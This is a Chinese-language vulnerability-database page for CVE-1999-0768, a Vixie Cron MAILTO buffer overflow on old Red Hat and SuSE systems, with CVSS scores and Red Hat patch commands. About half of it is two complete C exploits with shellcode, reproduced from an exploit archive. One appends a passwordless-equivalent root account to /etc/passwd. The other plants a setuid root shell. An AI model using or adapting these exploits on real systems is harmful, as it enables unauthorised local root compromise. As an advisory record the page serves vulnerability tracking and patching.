CVE-1999-0768
CVSS7.5
发布时间 :1999-08-25 00:00:00
修订时间 :2008-09-09 08:35:21
NMCOE    

[原文]Buffer overflow in Vixie Cron on Red Hat systems via the MAILTO environmental variable.


[CNNVD]Vixie Cron缓冲器溢出漏洞(CNNVD-199908-050)

        基于Red Hat系统的Vixie Cron存在缓冲区溢出漏洞。可以借助MAILTO环境变量导致该漏洞。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:redhat:linux:6.0::i386
cpe:/o:redhat:linux:4.2Red Hat Linux 4.2
cpe:/o:suse:suse_linux:6.0SuSE SuSE Linux 6.0
cpe:/o:redhat:linux:5.2::i386
cpe:/o:suse:suse_linux:6.1SuSE SuSE Linux 6.1

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0768
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0768
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199908-050
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/602
(UNKNOWN)  BID  602

- 漏洞信息

Vixie Cron缓冲器溢出漏洞
高危 缓冲区溢出
1999-08-25 00:00:00 2005-05-02 00:00:00
本地  
        基于Red Hat系统的Vixie Cron存在缓冲区溢出漏洞。可以借助MAILTO环境变量导致该漏洞。

- 公告与补丁

        Red Hat Linux 4.2:
        Intel:
        rpm -Uvh ftp://ftp.redhat.com/redhat/updates/4.2/i386/vixie-cron-3.0.1-36.4.2.i386.rpm
        Alpha:
        rpm -Uvh ftp://ftp.redhat.com/redhat/updates/4.2/alpha/vixie-cron-3.0.1-36.4.2.alpha.rpm
        Sparc:
        rpm -Uvh ftp://ftp.redhat.com/redhat/updates/4.2/sparc/vixie-cron-3.0.1-36.4.2.sparc.rpm
        Source packages:
        rpm -Uvh ftp://ftp.redhat.com/redhat/updates/4.2/SRPMS/vixie-cron-3.0.1-36.4.2.src.rpm
        Red Hat Linux 5.2:
        Intel:
        rpm -Uvh ftp://ftp.redhat.com/redhat/updates/5.2/i386/vixie-cron-3.0.1-36.5.2.i386.rpm
        Alpha:
        rpm -Uvh ftp://ftp.redhat.com/redhat/updates/5.2/alpha/vixie-cron-3.0.1-36.5.2.alpha.rpm
        Sparc:
        rpm -Uvh ftp://ftp.redhat.com/redhat/updates/5.2/sparc/vixie-cron-3.0.1-36.5.2.sparc.rpm
        Source packages:
        rpm -Uvh ftp://ftp.redhat.com/redhat/updates/5.2/SRPMS/vixie-cron-3.0.1-36.5.2.src.rpm
        Red Hat Linux 6.0:
        Intel:
        rpm -Uvh ftp://ftp.redhat.com/redhat/updates/6.0/i386/vixie-cron-3.0.1-37.i386.rpm
        Alpha:
        rpm -Uvh ftp://ftp.redhat.com/redhat/updates/6.0/alpha/vixie-cron-3.0.1-37.alpha.rpm
        Sparc:
        rpm -Uvh ftp://ftp.redhat.com/redhat/updates/6.0/sparc/vixie-cron-3.0.1-37.sparc.rpm
        Source packages:
        rpm -Uvh ftp://ftp.redhat.com/redhat/updates/6.0/SRPMS/vixie-cron-3.0.1-37.src.rpm
        For each RPM for your particular architecture, run:
        rpm -Uvh
        where filename is the name of the RPM.

- 漏洞信息 (19469)

RedHat Linux 4.2/5.2/6.0,S.u.S.E. Linux 6.0/6.1 Cron Buffer Overflow Vulnerability (1) (EDBID:19469)
linux local
1999-08-30 Verified
0 Akke
N/A [点击下载]
source: http://www.securityfocus.com/bid/602/info

The version of Vixie cron that ships with RedHat versions 4.2, 5.2 and 6.0 is vulnerable to a local buffer overflow attack. By utilizing the MAILTO environment variable, a buffer can be overflown in the cron_popen() function, allowing an attacker to execute arbitrary code. Vixie cron daemon is installed setuid root by default, allowing for a local root compromise. Recent versions of Debian GNU/Linux have been confirmed to not be vulnerable to this attack. 

/*
	vixie-crontab-3.0.1 cron_popen() exploit by Akke - 30-8-99
			Akke <c4c4@hehe.com>
	

	how to compile ?
		gcc crontab_exploit.c -o crontab_exploit

	how to use ?
		./crontab_exploit
		crontab ./CrOn
		wait 1 minute
		crontab -r
		su -l cronexpl (password = exploited) (this is root account)
		
	Greets to: bugtraq
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

char shellcode[] =
	"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
	"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
	"\x80\xe8\xdc\xff\xff\xff/tmp/ce";

#define max_buf_len 1000
#define CronFile         "CrOn"
#define RootScript       "/tmp/cron_root"
#define CronEchoScript   "/tmp/cron_echo"
#define chmod_bin        "/bin/chmod"

int main()
{
	char crontab_file_string[max_buf_len];
	char temp[max_buf_len];
	FILE *fp;
	int i;

	strcpy(temp, 
	"T h i s _ i s _ a _ s i m p l e _ e x p l o i t _ w r i t t e n _ b y _ A K K E _ "
	"T h i s _ i s _ a _ s i m p l e _ e x p l o i t _ w r i t t e n _ b y _ A K K E _ "
	"_ _ _ _ _ _ _ _ _ _ _ _ _ _ ");
	sprintf(temp,"%s%s",temp,shellcode);
	sprintf(crontab_file_string,"MAILTO=%s\n",temp);
	strcat(crontab_file_string,"0");
	for (i=1;i<60;i++) sprintf(crontab_file_string,"%s,%d",crontab_file_string,i);
	sprintf(temp," * * * * %s\n",CronEchoScript);
	strcat(crontab_file_string,temp);

	if ((fp = fopen(CronFile,"w+")) != NULL) {
		fprintf(fp,"%s",crontab_file_string);
		fclose(fp);	
	}
	
	if ((fp = fopen(CronEchoScript,"w+")) != NULL) {
		fprintf(fp,"#!/bin/sh\necho Wrong window!");
		fclose(fp);
		sprintf(temp,"%s 777 %s",chmod_bin,CronEchoScript);
		system(temp);
	}
	
	if ((fp = fopen(RootScript,"w+")) != NULL) {
		#define login "cronexpl"
		#define passw "1T8uqGnJZ0OsQ" /* "exploited" */
		fprintf(fp,"#!/bin/sh\necho %s:%s:0:0::/root:/bin/bash >> /etc/passwd\nrm %s %s %s",login,passw,CronEchoScript,"/tmp/ce",RootScript);
		fclose(fp);
		sprintf(temp,"%s 777 %s",chmod_bin,RootScript);
		system(temp);
	}

	if ((fp = fopen("/tmp/ce","w+")) != NULL) {
		fprintf(fp,"#!/bin/sh\n%s\n",RootScript);
		fclose(fp);
		sprintf(temp,"%s 777 %s",chmod_bin,"/tmp/ce");
		system(temp);
	}
	exit(0);
}
		

- 漏洞信息 (19470)

RedHat Linux 4.2/5.2/6.0,S.u.S.E. Linux 6.0/6.1 Cron Buffer Overflow Vulnerability (2) (EDBID:19470)
linux local
1999-08-25 Verified
0 jbowie
N/A [点击下载]
source: http://www.securityfocus.com/bid/602/info
 
The version of Vixie cron that ships with RedHat versions 4.2, 5.2 and 6.0 is vulnerable to a local buffer overflow attack. By utilizing the MAILTO environment variable, a buffer can be overflown in the cron_popen() function, allowing an attacker to execute arbitrary code. Vixie cron daemon is installed setuid root by default, allowing for a local root compromise. Recent versions of Debian GNU/Linux have been confirmed to not be vulnerable to this attack. 

/*
 * VixieCron 3.0 Proof of Concept Exploit - w00w00
 * 
 * Not only does Paul give up root with this one, but with his creative use of
 * strtok() he actually ends up putting the address of our shellcode in eip.  
 * 
 * Many Thanks: Cheez Wiz, Sangfroid
 * Thanks: stran9er, Shok
 * Props: attrition.org,mea_culpa,awr,minus,Int29,napster,el8.org,w00w00
 * Drops: Vixie, happyhacker.org, antionline.com, <insert your favorite web \
 *        defacement group here>
 *        
 * Hellos: pm,cy,bm,ceh,jm,pf,bh,wjg,spike.
 * 
 * -jbowie@el8.org
 * 
 */
   
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>
#include <pwd.h>

char shellcode[] =
        "\xeb\x40\x5e\x89\x76\x0c\x31\xc0\x89\x46\x0b\x89\xf3\xeb"
        "\x27w00w00:Ifwewerehackerswedownyourdumbass\x8d\x4e"
        "\x0c\x31\xd2\x89\x56\x16\xb0\x0b\xcd\x80\xe8\xbb\xff\xff"
        "\xff/tmp/w00w00";
        
int     
main(int argc,char *argv[])

        FILE *cfile,*tmpfile;
        struct stat sbuf;
        struct passwd *pw;
        int x;
        
        pw = getpwuid(getuid());
        
        chdir(pw->pw_dir);
        cfile = fopen("./cronny","a+");
        tmpfile = fopen("/tmp/w00w00","a+");
        
        fprintf(cfile,"MAILTO=");
        for(x=0;x<96;x++)
                fprintf(cfile,"w00w00 ");
        fprintf(cfile,"%s",shellcode);
        fprintf(cfile,"\n* * * * * date\n");
        fflush(cfile);

        fprintf(tmpfile,"#!/bin/sh\ncp /bin/bash %s\nchmod 4755 %s/bash\n", pw->pw_dir,pw->pw_dir);
        fflush(tmpfile);
          
        fclose(cfile),fclose(tmpfile);
   
        chmod("/tmp/w00w00",S_IXUSR|S_IXGRP|S_IXOTH);
   
        if(!(fork())) {
                execl("/usr/bin/crontab","crontab","./cronny",(char *)0);
        } else {  
                printf("Waiting for shell be patient....\n");
                for(;;) {
                        if(!(stat("./bash",&sbuf))) {
                                        break;
                        } else { sleep(5); }
                } 
                if((fork())) {
                        printf("Thank you for using w00warez!\n");
                        execl("./bash","bash",(char *)0);
                } else {  
                        remove("/tmp/w00w00");
                        sleep(5);
                        remove("./bash");
                        remove("./cronny");
                        execl("/usr/bin/crontab","crontab","-r",(char *)0);
                }
        }
}
		

- 漏洞信息

1058
Vixie Cron MAILTO Environement Variable Overflow
Local Access Required Input Manipulation
Loss of Integrity Third-Party Solution
Exploit Public Uncoordinated Disclosure

- 漏洞描述

- 时间线

1999-08-25 Unknow
Unknow Unknow

- 解决方案

Upgrade to version 2.1 or higher for Debian Linux, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站